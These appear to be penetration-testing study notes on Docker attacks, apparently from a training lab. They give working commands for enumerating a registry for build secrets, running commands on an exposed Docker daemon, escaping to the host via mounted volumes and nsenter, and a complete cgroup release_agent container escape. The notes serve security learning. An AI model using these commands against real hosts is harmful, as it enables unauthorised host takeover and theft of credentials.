3.0 KiB
3.0 KiB
Docker Vulnerabilities
Abusing Registry
- Registry Doc
- Registry is a json API endpoint
- Private registry added in
/etc/docker/daemon.json
- Can be found by nmap as a service
Enumeration
- General query
curl http://test.com:5000/v2/_catalog`
- List tags
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
history
section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
Reversing Docker Images
dive <IMAGE-ID>
Uploading Images to Registry
- Ever image has a
latest
tag - Upload modified docker image as
latest
- Article
RCE via Exposed Docker Daemon
-
Users inside the
docker
group may open tcp socket through docker -
nmap -sV -p- <IP> -vv
to find exposed tcp sockets via docker -
Confirming via
curl http://test.com:2375/version
on open docker port -
Execute commands on socket
docker -H tcp://test.com:2375 ps docker -H tcp://test.com:2375 exec <container> <cmd>
Escape Container via Exposed Docker Daemon
- Looking for exposed docker sockets
find / -name "*sock"
groups
- Mount the host volume and chroot to it, need alpine image
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Shared Namespaces
-
Namespaces
-
Cgroups
-
OverlayFS
-
Requires root inside the container
-
Execute command
nsenter --target 1 --mount sh
Misconfiguration
- Privileged container connect to the host directly, not through the docker engine
- Execution of bins on the host from libs inside the container is possible
capsh --print
-
man capabilities
-
Exploit
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
runC
Securing a Container
- Least Privileges
- Seccomp
- Securing Registry via TLS
Checking if you are inside a container
- Low process count
ps aux
.dockerenv
in/
cd / && ls -lah
- cgroups contain docker names
pwd /proc/1
cat cgroups